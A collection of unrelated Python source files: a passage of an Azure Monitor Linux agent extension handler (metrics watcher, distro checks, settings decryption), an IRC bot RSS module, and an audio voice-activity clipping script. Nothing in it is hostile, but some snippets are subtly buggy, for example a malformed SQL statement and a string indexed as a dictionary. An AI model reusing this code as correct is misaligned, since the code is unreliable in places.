telemetry process that performs periodic monitoring activities :return: None """ stop_metrics_process() #start telemetry watcher omsagent_filepath = os.path.join(os.getcwd(),'agent.py') args = ['python', omsagent_filepath, 
'-metrics'] log = open(os.path.join(os.getcwd(), 'daemon.log'), 'w') HUtilObject.log('start watcher process '+str(args)) subprocess.Popen(args, stdout=log, stderr=log) def metrics_watcher(hutil_error, hutil_log): """ Watcher thread to monitor metric configuration changes and to take action on them """ # check every 30 seconds sleepTime = 30 # sleep before starting the monitoring. time.sleep(sleepTime) last_crc = None me_msi_token_expiry_epoch = None while True: try: if os.path.isfile(MdsdCounterJsonPath): f = open(MdsdCounterJsonPath, "r") data = f.read() if (data != ''): json_data = json.loads(data) if len(json_data) == 0: last_crc = hashlib.sha256(data).hexdigest() if telhandler.is_running(is_lad=False): #Stop the telegraf and ME services tel_out, tel_msg = telhandler.stop_telegraf_service(is_lad=False) if tel_out: HUtilObject.log(tel_msg) else: HUtilObject.error(tel_msg) #Delete the telegraf and ME services tel_rm_out, tel_rm_msg = telhandler.remove_telegraf_service() if tel_rm_out: HUtilObject.log(tel_rm_msg) else: HUtilObject.error(tel_rm_msg) if me_handler.is_running(is_lad=False): me_out, me_msg = me_handler.stop_metrics_service(is_lad=False) if me_out: HUtilObject.log(me_msg) else: HUtilObject.error(me_msg) me_rm_out, me_rm_msg = me_handler.remove_metrics_service(is_lad=False) if me_rm_out: HUtilObject.log(me_rm_msg) else: HUtilObject.error(me_rm_msg) else: crc = hashlib.sha256(data).hexdigest() generate_token = False me_token_path = os.path.join(os.getcwd(), "/config/metrics_configs/AuthToken-MSI.json") if me_msi_token_expiry_epoch is None or me_msi_token_expiry_epoch == "": if os.path.isfile(me_token_path): with open(me_token_path, "r") as f: authtoken_content = f.read() if authtoken_content and "expires_on" in authtoken_content: me_msi_token_expiry_epoch = authtoken_content["expires_on"] else: generate_token = True else: generate_token = True if me_msi_token_expiry_epoch: currentTime = datetime.datetime.now() token_expiry_time = 
datetime.datetime.fromtimestamp(int(me_msi_token_expiry_epoch)) if token_expiry_time - currentTime < datetime.timedelta(minutes=30): # The MSI Token will expire within 30 minutes. We need to refresh the token generate_token = True if generate_token: generate_token = False msi_token_generated, me_msi_token_expiry_epoch, log_messages = me_handler.generate_MSI_token() if msi_token_generated: hutil_log("Successfully refreshed metrics-extension MSI Auth token.") else: hutil_error(log_messages) if(crc != last_crc): hutil_log("Start processing metric configuration") hutil_log(data) telegraf_config, telegraf_namespaces = telhandler.handle_config( json_data, "udp://127.0.0.1:" + metrics_constants.ama_metrics_extension_udp_port, "unix:///var/run/mdsd/default_influx.socket", is_lad=False) me_handler.setup_me(is_lad=False) start_telegraf_out, log_messages = telhandler.start_telegraf(is_lad=False) if start_telegraf_out: hutil_log("Successfully started metrics-sourcer.") else: hutil_error(log_messages) start_metrics_out, log_messages = me_handler.start_metrics(is_lad=False) if start_metrics_out: hutil_log("Successfully started metrics-extension.") else: hutil_error(log_messages) last_crc = crc telegraf_restart_retries = 0 me_restart_retries = 0 max_restart_retries = 10 # Check if telegraf is running, if not, then restart if not telhandler.is_running(is_lad=False): if telegraf_restart_retries < max_restart_retries: telegraf_restart_retries += 1 hutil_log("Telegraf binary process is not running. Restarting telegraf now. Retry count - {0}".format(telegraf_restart_retries)) tel_out, tel_msg = telhandler.stop_telegraf_service(is_lad=False) if tel_out: hutil_log(tel_msg) else: hutil_error(tel_msg) start_telegraf_out, log_messages = telhandler.start_telegraf(is_lad=False) if start_telegraf_out: hutil_log("Successfully started metrics-sourcer.") else: hutil_error(log_messages) else: hutil_error("Telegraf binary process is not running. Failed to restart after {0} retries. 
Please check telegraf.log".format(max_restart_retries)) else: telegraf_restart_retries = 0 # Check if ME is running, if not, then restart if not me_handler.is_running(is_lad=False): if me_restart_retries < max_restart_retries: me_restart_retries += 1 hutil_log("MetricsExtension binary process is not running. Restarting MetricsExtension now. Retry count - {0}".format(me_restart_retries)) me_out, me_msg = me_handler.stop_metrics_service(is_lad=False) if me_out: hutil_log(me_msg) else: hutil_error(me_msg) start_metrics_out, log_messages = me_handler.start_metrics(is_lad=False) if start_metrics_out: hutil_log("Successfully started metrics-extension.") else: hutil_error(log_messages) else: hutil_error("MetricsExtension binary process is not running. Failed to restart after {0} retries. Please check /var/log/syslog for ME logs".format(max_restart_retries)) else: me_restart_retries = 0 except IOError as e: hutil_error('I/O error in monitoring metrics. Exception={0}'.format(e)) except Exception as e: hutil_error('Error in monitoring metrics. Exception={0}'.format(e)) finally: time.sleep(sleepTime) def metrics(): """ Take care of setting up telegraf and ME for metrics if configuration is present """ pids_filepath = os.path.join(os.getcwd(), 'amametrics.pid') py_pid = os.getpid() with open(pids_filepath, 'w') as f: f.write(str(py_pid) + '\n') watcher_thread = Thread(target = metrics_watcher, args = [HUtilObject.error, HUtilObject.log]) watcher_thread.start() watcher_thread.join() return 0, "" # Dictionary of operations strings to methods operations = {'Disable' : disable, 'Uninstall' : uninstall, 'Install' : install, 'Enable' : enable, 'Update' : update, 'Metrics' : metrics, } def parse_context(operation): """ Initialize a HandlerUtil object for this operation. If the required modules have not been imported, this will return None. 
def find_package_manager(operation):
    """
    Checks if the dist is debian based or centos based and assigns the package
    manager accordingly
    """
    global PackageManager
    global BundleFileName

    distro_name, _distro_version = find_vm_distro(operation)
    lowered = distro_name.lower()

    # Debian-family distros use dpkg; the enterprise/RPM family uses rpm.
    if lowered.startswith(("debian", "ubuntu")):
        PackageManager = "dpkg"
        BundleFileName = BundleFileNameDeb
    if lowered.startswith(("oracle", "redhat", "centos", "red hat", "suse")):
        PackageManager = "rpm"
        BundleFileName = BundleFileNameRpm

    # Neither family matched: this extension cannot install its bundle here.
    if PackageManager == "":
        log_and_exit(operation, UnsupportedOperatingSystem, "The OS has neither rpm nor dpkg" )
def find_vm_distro(operation):
    """
    Finds the Linux Distribution this vm is running on.
    """
    vm_dist = vm_id = vm_ver = None
    try:
        vm_dist, vm_ver, vm_id = platform.linux_distribution()
    except AttributeError:
        # platform.linux_distribution() is absent on some Python builds;
        # fall back to the older platform.dist().
        vm_dist, vm_ver, vm_id = platform.dist()

    if not vm_dist and not vm_ver: # SLES 15 and others
        # Distros that platform cannot identify publish their identity in
        # /etc/os-release instead; parse ID= and VERSION_ID= by hand.
        try:
            with open('/etc/os-release', 'r') as fp:
                for line in fp:
                    if line.startswith('ID='):
                        vm_dist = line.split('=')[1]
                        # e.g. "opensuse-leap" -> "opensuse"
                        vm_dist = vm_dist.split('-')[0]
                        vm_dist = vm_dist.replace('\"', '').replace('\n', '')
                    elif line.startswith('VERSION_ID='):
                        vm_ver = line.split('=')[1]
                        # keep only the major version component
                        vm_ver = vm_ver.split('.')[0]
                        vm_ver = vm_ver.replace('\"', '').replace('\n', '')
        except:
            # NOTE(review): any failure here (missing file, parse error) is
            # treated as an unknown OS and terminates the operation.
            log_and_exit(operation, UndeterminateOperatingSystem, 'Undeterminate operating system')
    return vm_dist, vm_ver
def is_vm_supported_for_extension(operation):
    """
    Checks if the VM this extension is running on is supported by
    AzureMonitorAgent.

    Returns for platform.linux_distribution() vary widely in format, such as
    '7.3.1611' returned for a VM with CentOS 7, so the first provided digits
    must match. The supported distros of the AzureMonitorLinuxAgent are
    allowed to utilize this VM extension; all other distros get error code 51.

    Returns (vm_supported, vm_dist, vm_ver).
    """
    supported_dists = {'redhat' : ['6', '7'], # CentOS
                       'centos' : ['6', '7'], # CentOS
                       'red hat' : ['6', '7'], # Oracle, RHEL
                       'oracle' : ['6', '7'], # Oracle
                       'debian' : ['8', '9'], # Debian
                       'ubuntu' : ['14.04', '16.04', '18.04'], # Ubuntu
                       'suse' : ['12'], 'sles' : ['15'] # SLES
    }

    vm_supported = False
    vm_dist, vm_ver = find_vm_distro(operation)

    # Find this VM distribution in the supported list
    for supported_dist in supported_dists.keys():
        if not vm_dist.lower().startswith(supported_dist):
            continue

        # Check if this VM distribution version is supported
        vm_ver_split = vm_ver.split('.')
        for supported_ver in supported_dists[supported_dist]:
            supported_ver_split = supported_ver.split('.')

            # If vm_ver is at least as precise (at least as many digits) as
            # supported_ver and matches all the supported_ver digits, then
            # this VM is guaranteed to be supported
            vm_ver_match = True
            for idx, supported_ver_num in enumerate(supported_ver_split):
                try:
                    supported_ver_num = int(supported_ver_num)
                    vm_ver_num = int(vm_ver_split[idx])
                # BUGFIX: also catch ValueError so a non-numeric version
                # component (e.g. "7a") marks the VM unsupported instead of
                # crashing the operation.
                except (IndexError, ValueError):
                    vm_ver_match = False
                    break
                # BUGFIX: the original used "is not" here, which compares
                # object identity and only happens to work for small ints
                # because of CPython's int caching. Use value inequality.
                if vm_ver_num != supported_ver_num:
                    vm_ver_match = False
                    break
            if vm_ver_match:
                vm_supported = True
                break

        if vm_supported:
            break

    return vm_supported, vm_dist, vm_ver
def run_command_and_log(cmd, check_error = True, log_cmd = True):
    """
    Run the provided shell command and log its output, including stdout and
    stderr. The output should not contain any PII, but the command might;
    in this case, log_cmd should be set to False.
    """
    exit_code, output = run_get_output(cmd, check_error, log_cmd)
    if log_cmd:
        hutil_log_info('Output of command "{0}": \n{1}'.format(cmd, output))
    else:
        hutil_log_info('Output: \n{0}'.format(output))

    # Also write output to STDERR since the WA agent uploads that to the
    # Azlinux Kusto DB; keep only the last 500 characters as the extension
    # cuts off after that. (The original comment claimed 100; the code has
    # always sliced 500.)
    try:
        # BUGFIX: "is not 0" compared identity, not value; it only worked by
        # CPython's small-int caching. Use a value comparison.
        if exit_code != 0:
            sys.stderr.write(output[-500:])

        if "Permission denied" in output:
            # Enable failures
            # https://github.com/Azure/azure-marketplace/wiki/Extension-Build-Notes-Best-Practices#error-codes-and-messages-output-to-stderr
            exit_code = 52
    # BUGFIX: narrowed the bare "except:" so SystemExit/KeyboardInterrupt
    # are no longer swallowed.
    except Exception:
        hutil_log_info('Failed to write output to STDERR')

    return exit_code, output
def is_dpkg_locked(exit_code, output):
    """
    Return True when the command output indicates the dpkg database is locked
    by another process (output contains a line mentioning dpkg and a lock),
    e.g. 'dpkg status database is locked by another process'.
    Only a non-zero exit_code is ever treated as a lock condition.
    """
    # BUGFIX: "is not 0" compared object identity and only worked because of
    # CPython's small-int caching; use a value comparison instead.
    if exit_code != 0:
        dpkg_locked_search = r'^.*dpkg.+lock.*$'
        dpkg_locked_re = re.compile(dpkg_locked_search, re.M)
        if dpkg_locked_re.search(output):
            return True
    return False
def retry_if_dpkg_locked(exit_code, output):
    """
    Some commands fail because the package manager is locked (apt-get/dpkg
    only); this will allow retries on failing commands.

    Returns (should_retry, retry_message, retry_verbosely).
    """
    retry_verbosely = False
    dpkg_locked = is_dpkg_locked(exit_code, output)
    # BUGFIX: removed a dead "run_get_output('which apt-get', ...)" call
    # whose result was never used -- it spawned a subprocess on every retry
    # check for nothing.
    if dpkg_locked:
        return True, 'Retrying command because package manager is locked.', \
               retry_verbosely
    else:
        return False, '', False
encoded_cert_path = os.path.join('/var/lib/waagent', '{0}.crt'.format( settings_thumbprint)) encoded_key_path = os.path.join('/var/lib/waagent', '{0}.prv'.format( settings_thumbprint)) decoded_settings = base64.standard_b64decode(encoded_settings) decrypt_cmd = 'openssl smime -inform DER -decrypt -recip {0} ' \ '-inkey {1}'.format(encoded_cert_path, encoded_key_path) try: session = subprocess.Popen([decrypt_cmd], shell = True, stdin = subprocess.PIPE, stderr = subprocess.STDOUT, stdout = subprocess.PIPE) output = session.communicate(decoded_settings) except OSError: pass protected_settings_str = output[0] if protected_settings_str is None: log_and_exit('Enable', 1, 'Failed decrypting ' \ 'protectedSettings') protected_settings = '' try: protected_settings = json.loads(protected_settings_str) except: hutil_log_error('JSON exception decoding protected settings') SettingsDict['protected_settings'] = protected_settings return public_settings, protected_settings def update_status_file(operation, exit_code, exit_status, message): """ Mimic HandlerUtil method do_status_report in case hutil method is not available Write status to status file """ handler_env = get_handler_env() try: extension_version = str(handler_env['version']) status_dir = str(handler_env['handlerEnvironment']['statusFolder']) except: extension_version = "1.0" status_dir = os.path.join(os.getcwd(), 'status') status_txt = [{ "version" : extension_version, "timestampUTC" : time.strftime("%Y-%m-%dT%H:%M:%SZ", time.gmtime()), "status" : { "name" : "Microsoft.Azure.Monitor.AzureMonitorLinuxAgent", "operation" : operation, "status" : exit_status, "code" : exit_code, "formattedMessage" : { "lang" : "en-US", "message" : message } } }] status_json = json.dumps(status_txt) # Find the most recently changed config file and then use the # corresponding status file latest_seq_no = get_latest_seq_no() status_path = os.path.join(status_dir, '{0}.status'.format(latest_seq_no)) status_tmp = '{0}.tmp'.format(status_path) 
def get_handler_env():
    """
    Set and retrieve the contents of HandlerEnvironment.json as JSON
    """
    # Parsed once and cached in the module-level global; subsequent calls
    # return the cached value without re-reading the file.
    global HandlerEnvironment
    if HandlerEnvironment is None:
        handler_env_path = os.path.join(os.getcwd(), 'HandlerEnvironment.json')
        try:
            with open(handler_env_path, 'r') as handler_env_file:
                handler_env_txt = handler_env_file.read()
            handler_env = json.loads(handler_env_txt)
            # The agent may wrap the environment object in a one-element list.
            if type(handler_env) == list:
                handler_env = handler_env[0]
            HandlerEnvironment = handler_env
        except Exception as e:
            # On any read/parse failure the cache stays None and the error is
            # logged; callers must tolerate a None return.
            waagent_log_error(str(e))
    return HandlerEnvironment
def hutil_log_info(message):
    """
    Log informational message, being cautious of possibility that hutil may
    not be imported and configured
    """
    if HUtilObject is None:
        # No handler utility available -- fall back to stdout.
        print('Info: {0}'.format(message))
    else:
        HUtilObject.log(message)
def log_and_exit(operation, exit_code = 1, message = ''):
    """
    Log the exit message and perform the exit
    """
    # BUGFIX: "exit_code is 0" compared identity; it only worked via
    # CPython's small-int caching. Use a value comparison.
    if exit_code == 0:
        waagent_log_info(message)
        hutil_log_info(message)
        exit_status = 'success'
    else:
        waagent_log_error(message)
        hutil_log_error(message)
        exit_status = 'failed'

    if HUtilObject is not None:
        # do_exit performs the status report and terminates the process.
        HUtilObject.do_exit(exit_code, operation, exit_status, str(exit_code),
                            message)
    else:
        update_status_file(operation, str(exit_code), exit_status, message)
        sys.exit(exit_code)
module_rss.py
#!/usr/bin/env python # -*- coding: utf-8 -*- """ Parse RSS feeds and display new entries on channel @author Henri 'fgeek' Salo <henri@nerv.fi>, Tomi 'dmc' Nykänen, Riku 'Shrike' Lindblad @copyright Copyright (c) 2010-2013 pyfibot developers @licence BSD Possible output syntax: 0 == feed_title: title - url 1 == feed_title: title - shorturl 2 == feed_title: title (id) 3 == feed_title: title 4 == title Config format: database: rss.db delays: rss_sync: 300 # How often we synchronize rss-feeds in seconds output: 7 # Delay in output to channels in seconds output_syntax: 0 bitly_api_key: # Only needed if using shorturl format With output_syntax #2 you could get url via .url <id> """ from __future__ import unicode_literals, print_function, division from threading import Thread import hashlib import logging import logging.handlers import os import re import requests import sqlite3 import sys import traceback try: import feedparser from twisted.internet import reactor import yaml import htmlentitydefs init_ok = True except ImportError, error: print('Error starting rss module: %s' % error) init_ok = False log = logging.getLogger('rss') # Initialize logger t = None t2 = None indexfeeds_callLater = None output_callLater = None rssconfig = None def event_signedon(bot): """Starts rotators""" global indexfeeds_callLater, output_callLater, rssconfig if not init_ok: log.error("Config not ok, not starting rotators") return False if (empty_database > 0): if (indexfeeds_callLater != None): log.info("Stopping previous indexfeeds thread") indexfeeds_callLater.cancel() rotator_indexfeeds(bot, rssconfig["delays"]["rss_sync"]) if (output_callLater != None): log.info("Stopping previous output thread") output_callLater.cancel() rotator_output(bot, rssconfig["delays"]["output"]) def init(botconfig): """Creates database if it doesn't exist""" if not init_ok: log.error("Config not ok, skipping init") return False global rssconfig # Read configuration configfile = os.path.join(sys.path[0], 
'modules', 'module_rss.conf') rssconfig = yaml.load(file(configfile)) db_conn = sqlite3.connect(rssconfig["database"]) d = db_conn.cursor() d.execute("CREATE TABLE IF NOT EXISTS feeds (id INTEGER PRIMARY KEY,feed_url TEXT,channel TEXT,feed_title TEXT, output_syntax_id INTEGER);") d.execute("CREATE TABLE IF NOT EXISTS titles_with_urls (id INTEGER PRIMARY KEY,feed_url TEXT,title TEXT,url TEXT,channel TEXT,printed INTEGER,hash TEXT UNIQUE);") db_conn.commit() # Check if database is empty global empty_database empty_database = d.execute("SELECT COUNT(*) FROM feeds").fetchone()[0] d.close() def rss_addfeed(bot, user, channel, feed_url, output_syntax): """Adds RSS-feed to sqlite-database""" global empty_database try: feed_data = feedparser.parse(feed_url) feed_title = feed_data['feed']['title'] except KeyError, e: return bot.say(channel, "Nothing inserted to database. Probably you mistyped URL?") # Initialize connection to database-file db_conn = sqlite3.connect(rssconfig["database"]) d = db_conn.cursor() # Lets create scheme if the database-file does not exist try: fileinfo = os.stat(rssconfig["database"]) if not os.path.isfile(rssconfig["database"]) or fileinfo.st_size == 0: d.execute("CREATE TABLE feeds int primary key unique, url text)") db_conn.commit() bot.say(channel, "Database \"%s\" created." % rssconfig["database"]) except Exception, e: bot.say(channel, "Error: %s" % e) d.execute("SELECT * FROM feeds WHERE feed_url = ? AND channel = ?", (feed_url, channel, )) already_on_db = d.fetchone() if already_on_db is None: data = [None, feed_url, channel, feed_title, output_syntax] d.execute("INSERT INTO feeds VALUES (?, ?, ?, ?, ?)", data) db_conn.commit() d.close() if (empty_database == 0): rotator_indexfeeds(bot, rssconfig["delays"]["rss_sync"]) rotator_output(bot, rssconfig["delays"]["output"]) empty_database = 1 return bot.say(channel, "Url \"%s\" inserted to database." 
def rss_delfeed(bot, user, channel, args):
    """Deletes RSS-feed from sqlite-database by given ID or feed URL."""
    db_conn = sqlite3.connect(rssconfig["database"])
    d = db_conn.cursor()
    d.execute("SELECT id, feed_url, channel FROM feeds WHERE id = ? OR feed_url = ?", (args, args,))
    row = d.fetchone()
    # BUGFIX: the original indexed row[1] unconditionally and crashed with
    # TypeError when no feed matched the given ID/URL.
    if row is None:
        d.close()
        return bot.say(channel, "Feed \"%s\" not found" % args)
    feed_url = row[1]
    if (db_conn.execute("DELETE FROM feeds WHERE channel = ? AND id = ? OR channel = ? AND feed_url = ?", (channel, args, channel, args)).rowcount == 1):
        db_conn.commit()
        bot.say(channel, "Feed %s deleted successfully" % feed_url.encode("UTF-8"))
    d.close()
def rss_listfeeds(bot, user, channel, args):
    """Lists all RSS-feeds added to channel"""
    # list_feeds returns [id, feed_url, channel] triples for this channel.
    for feed_id, feed_url, _chan in list_feeds(channel):
        bot.say(channel, "%s: %s" % (feed_id, feed_url))
def remove_html_tags(data):
    """Strip anything that looks like an HTML/XML tag from *data*."""
    # Non-greedy match so "<b>x</b>" loses both tags but keeps the text.
    return re.sub(r'<.*?>', '', data)
% (title, url, feed_url, channel)) id = d.lastrowid db_conn.commit() db_conn.close() except sqlite3.IntegrityError, e: # Couldn't add entry twice return except Exception: log.error('Error in sqlite_add_item') log.error(traceback.format_exc()) pass def indexfeeds(bot): """Updates all RSS-feeds found on database and outputs new elements""" try: cleanup = 0 log.debug("indexfeeds thread started") db_conn = sqlite3.connect(rssconfig["database"]) d = db_conn.cursor() # If table is removed, then create a new one titles_table_exists = d.execute("SELECT count(*) FROM sqlite_master WHERE type='table' AND name='titles_with_urls'").fetchone() if (titles_table_exists[0] == 0): init(None) # Let's count all rows to index rowcount = 0 rows = d.execute("SELECT id, feed_url, channel FROM feeds ORDER BY id") for row in rows: rowcount = rowcount + 1 log.debug('Feed count is: %i' % rowcount) feeds = list_feeds(-1) for feed in feeds: id = feed[0] feed_url = feed[1] log.debug('Indexing feed %s: %s' % (id, feed_url)) channel = feed[2] # If first run of current feed, insert new elements as "printed" so bot won't flood whole feed on startup/insert cleanup = 0 titles_count = d.execute("SELECT count(*) FROM titles_with_urls WHERE feed_url = ?", (feed_url,)).fetchone() if (titles_count[0] == 0): cleanup = 1 feed_data = feedparser.parse(feed_url) feed_data.entries.reverse() for entry in feed_data.entries: try: title = remove_html_tags(entry['title']) url = entry['link'] sqlite_add_item(bot, feed_url, title, url, channel, cleanup) except KeyError, e: log.debug('indexfeeds: Keyerror %s' % e) except Exception, e: log.debug('indexfeeds first: Exception %s' % e) db_conn.close() log.debug("indexfeeds thread terminated") except Exception: log.error('Error in indexfeeds') log.error(traceback.format_exc()) def command_url(bot, user, channel, args): """Prints feed's element url by given id""" id = args try: db_conn = sqlite3.connect(rssconfig["database"]) d = db_conn.cursor() d.execute("SELECT * FROM 
def command_url(bot, user, channel, args):
    """Prints feed's element url by given id"""
    id = args
    try:
        db_conn = sqlite3.connect(rssconfig["database"])
        d = db_conn.cursor()
        d.execute("SELECT * FROM titles_with_urls WHERE id = ?", (id,))
        row = d.fetchone()
        if (row != None):
            # Cleanup: the original also unpacked id/feed_url/title from the
            # row but never used them; only channel and url matter here.
            channel = row[4].encode("UTF-8")
            url = row[3].encode("UTF-8")
            bot.say(channel, "%s" % (url))
    except Exception:
        log.error('Error in command_url')
        log.error(traceback.format_exc())
def rotator_indexfeeds(bot, delay):
    """Timer for methods/functions: run the feed indexer on a background
    thread and reschedule itself via twisted's reactor."""
    try:
        global t, t2, indexfeeds_callLater
        # Idiom fix: the original tested type(t2).__name__ == 'NoneType' and
        # "t2.isAlive() == False" in an elif; this is the equivalent identity
        # check. Only start a new indexer if the output thread is idle.
        if t2 is None or not t2.isAlive():
            t = Thread(target=indexfeeds, args=(bot,))
            t.daemon = True
            t.start()
        # Keep rescheduling only while there are feeds to index.
        if (empty_database > 0):
            indexfeeds_callLater = reactor.callLater(delay, rotator_indexfeeds, bot, delay)
    except Exception:
        log.error('Error in rotator_indexfeeds')
        log.error(traceback.format_exc())
audio_detection_main.py
from voice_activity_detector import VoiceActivityDetector
import os
import datetime
import subprocess
import random
import re
import threading
import cleanup
import ffmpeg_calls
import logging

logging.basicConfig(filename='./logs/example.log', level=logging.DEBUG)
# BUG FIX: the module used a bare name `log` everywhere but never defined it
# (NameError on the first log call); bind a module-level logger.
log = logging.getLogger(__name__)

#Log format
#logging.debug('This message should go to the log file')
#logging.info('So should this')
#logging.warning('And this, too')


class Audio_Detector():
    """Parses the audio channels out of a video file, runs voice activity
    detection (VAD) on them and produces short clips of the densest speech
    regions.

    Directories:
        initial_directory: where source video/audio files live
        targetdirectory:   where finished clips are written
        wav_directory:     scratch space for intermediate wav files
    """

    def __init__(self, initial_directory, targetdirectory, wav_directory):
        self.initial_directory = initial_directory
        self.targetdirectory = targetdirectory
        self.wav_directory = wav_directory

    def shorten_given_file(self, sourcefile, lengthoffile, cuttosize=1200, randomtoken=True, outfile=None):
        """Cut a `cuttosize`-second sample out of each audio channel of
        `sourcefile` into wav files.

        If the file is shorter than `cuttosize`, the output covers the entire
        given audio stream. Returns the list of wav file paths created (empty
        when `outfile` was given explicitly).
        """
        filetype = sourcefile.split(".")[-1]

        # --------- Print stream metadata to streams.txt ------------------
        if filetype == "mp4":
            try:
                ffmpeg_calls.dump_streams_metadata(sourcefile, self.wav_directory)
            except Exception as e:
                log.debug("Could not create streams.txt file")
                log.debug(e)
                raise Exception("Could not create streams.txt file")

        # ---------- Find number of streams by reading streams.txt --------
        # NOTE(review): for file types other than mp4/wav this reads whatever
        # streams.txt a previous run left behind -- confirm that is intended.
        # (Fixed: file is now closed via `with` even if read() raises.)
        with open(self.wav_directory + "/streams.txt", 'r') as textfile:
            file_metadata = textfile.read()
        detected_streams = re.findall("Stream #0:(.+)Audio:", file_metadata)

        # Pick the sample start offset: 0 for short files or when randomness
        # is disabled, otherwise a random offset leaving room for the sample.
        if lengthoffile <= cuttosize or randomtoken == False:
            rnd = 0
        else:
            rnd = random.randint(60, int(lengthoffile - (cuttosize + 10)))

        outputarrs = []
        threads = []
        if detected_streams == []:
            log.warning("No Audio Streams Found")
            raise Exception("No audio streams found")
        elif filetype == "wav":
            # A wav input encodes its stream number in its own name
            # ("<n>output.wav"), so use that single stream.
            stream_file_name = sourcefile.split("/")[-1]
            stream_number = stream_file_name.split("output")[0]
            detected_streams = [stream_number]

        for stream in detected_streams:
            # stream[0] holds the audio stream number.
            i = stream[0]
            # Format the start offset the way ffmpeg expects (0HR:MN:SC).
            starttime = "0" + str(datetime.timedelta(seconds=rnd))
            # Encode every stream into a wav file using threads.
            if outfile == None:
                threads.append(threading.Thread(
                    target=ffmpeg_calls.shorten_file,
                    args=(self.wav_directory, starttime, sourcefile, cuttosize, i)))
                log.info(i + "output.wav created in " + self.wav_directory)
                outputarrs.append(self.wav_directory + "/" + str(i) + "output" + ".wav")
            else:
                threads.append(threading.Thread(
                    target=ffmpeg_calls.shorten_file_with_specified_outfile,
                    args=(starttime, sourcefile, cuttosize, i, outfile)))
                log.info(outfile + " created")

        for worker in threads:
            worker.start()
        for worker in threads:
            worker.join()

        # Names of the wav files created.
        return outputarrs

    def create_cutpoints_file(self, arr, destination_file):
        """Write cutpoints.txt (ffmpeg concat-demuxer syntax) listing the
        densest segments of `destination_file`.

        Each entry covers `num_cuts` seconds ending at the corresponding
        second-offset in `arr`. Returns 0 on success.
        """
        # If the file being cut is not an [0-9]output.wav file, the entries
        # refer to a plain "output.wav"; otherwise they refer to the same
        # [0-9]output.wav file that was fed into the function.
        if destination_file[-10:] != "output.wav":
            destination_file = "output.wav"
        num_cuts = int(300 / len(arr))
        file_name = destination_file.split("/")[-1]
        # Fixed: use `with` so the handle is closed even if a write raises.
        with open(self.wav_directory + "/" + "cutpoints.txt", "w") as cutfile:
            for point in arr:
                cutfile.write("file " + file_name + "\n")
                cutfile.write("inpoint " + str(point - num_cuts) + "\n")
                cutfile.write("outpoint " + str(point) + "\n")
        log.info("created text file with cutpoints")
        return 0

    def create_voice_activity_clip(self, filename, outfile_name):
        """Run VAD on `filename` and write a concatenated clip of its most
        speech-dense regions into the target directory.

        Returns the name of the clip file created.
        """
        log.info("Running VAD on " + str(filename))
        try:
            v = VoiceActivityDetector(filename)
        except Exception as e:
            # BUG FIX: `"..." + e` raised TypeError, and the original `pass`
            # fell through with `v` undefined; log properly and re-raise.
            log.info("ERROR at VAD " + str(filename) + " " + str(e))
            raise

        # Convert the phase-recognition windows to second-based labels.
        log.info("Converting windows to readible labels for " + str(filename))
        try:
            voice_activity_regions = v.convert_windows_to_readible_labels(v.detect_speech())
        except Exception:
            log.debug("ERROR at convert windows to readable labels for file" + str(filename))
            raise Exception

        # Flatten the list of region dicts into a flat list of times.
        voice_activity_regions_array = []
        for region in voice_activity_regions:
            voice_activity_regions_array = voice_activity_regions_array + list(region.values())

        # BUG FIX: the original tested `!= []`, logging "no voice activity"
        # exactly when activity WAS found (and never when it was missing).
        if voice_activity_regions_array == []:
            log.info("No voice activity detected for this clip.")
        log.info("Finished creating array of voice activity regions")

        try:
            # Seconds at which the stream should be cut.
            cut_areas = self.get_most_dense_range(voice_activity_regions_array)
            # Creates a cutpoints.txt file in the wav directory.
            self.create_cutpoints_file(cut_areas, filename)
        except Exception as e:
            log.debug("could not create a text file with cut areas")
            log.debug(e)
            raise Exception

        if outfile_name == None:
            # Derive a name: cut_stream<stream#>_<input base name>.wav
            # (filename[-11] is the stream digit of "<n>output.wav").
            file = "cut_stream" + filename[-11] + "_" + self.inputfile[:-4] + ".wav"
        else:
            file = outfile_name

        # Concatenate the selected dense regions into one clip (best-effort:
        # a CalledProcessError is logged but not re-raised, as before).
        try:
            ffmpeg_calls.create_shortened_file(self.wav_directory, self.targetdirectory, file)
        except subprocess.CalledProcessError as e:
            log.debug(e)
        log.info("Created: " + self.targetdirectory + "/" + file)
        return file

    def get_most_dense_range(self, arr, randtoken=False, videolength=1200):
        """Return the second-offsets whose trailing `fr_len`-second windows
        contain the most entries of `arr` (or random offsets if `randtoken`).
        """
        fr_len = 20                    # length (s) of each candidate segment
        num_cuts = int(120 / fr_len)   # number of segments to combine
        densities = []
        for i in range(fr_len, videolength):
            _len = len([j for j in arr if i - fr_len <= j <= i])
            densities.append(_len)
        densities = sorted(densities, reverse=True)
        max_densities = densities[0:num_cuts]
        # Translate the max densities (scalars) back to the times where those
        # phrase frequencies occur.
        cut_areas = []
        if randtoken is False:
            for i in range(fr_len, videolength):
                if len(cut_areas) >= num_cuts:
                    break
                _len = len([j for j in arr if i - fr_len <= j <= i])
                if _len in max_densities:
                    cut_areas.append(i)
        if randtoken == True:
            randlocs = random.sample(range(fr_len, videolength, fr_len), num_cuts)
            for i in randlocs:
                cut_areas.append(i)
        return cut_areas

    def pre_process_video_file(self, inputfile="audio.mp4", outfile_name=None, randtoken=False, callnumber=1):
        """Take a video file, parse out its respective audio channels, run
        voice activity detection on those channels, and generate a clip per
        channel representing the audio with the highest voice activity.
        """
        log.info("input before file " + inputfile)
        # Initialize inputs.
        self.inputfile = inputfile
        self.source_file = self.initial_directory + "/" + self.inputfile
        log.info("inputfile " + self.inputfile)
        log.info("source file " + self.source_file)

        # ------------ Find the length of your file -------------
        lengthoffile = int(ffmpeg_calls.retrieve_len(self.source_file))
        log.info("Length of file " + str(lengthoffile))
        if lengthoffile == 0:
            log.info("ERROR: Length of file is 0" + inputfile)
            raise Exception("Length of file is 0")

        # TODO: create a different function for second time processing.
        # Transcode the video into wav file(s) for audio analysis, written to
        # the wav directory. On a re-run (callnumber >= 2) the input already
        # is a wav file.
        if callnumber >= 2:
            wav_encoded_files = [self.initial_directory + "/" + inputfile]
        else:
            try:
                wav_encoded_files = self.shorten_given_file(self.source_file, lengthoffile=lengthoffile, cuttosize=2400)
            except Exception as e:
                log.debug("ERROR: Can't shorten given file")
                log.debug(e)
                raise Exception
        log.info("wav_encoded_files " + str(wav_encoded_files))

        # Only do audio analysis on a file longer than 5 minutes.
        if lengthoffile > 300:
            threads = []
            for wav_file in wav_encoded_files:
                threads.append(threading.Thread(target=self.create_voice_activity_clip, args=(wav_file, outfile_name,)))
            print(threads)
            for worker in threads:
                worker.start()
            for worker in threads:
                worker.join()
        else:
            log.warning("File is short. Uploading the wav file without audio analysis")
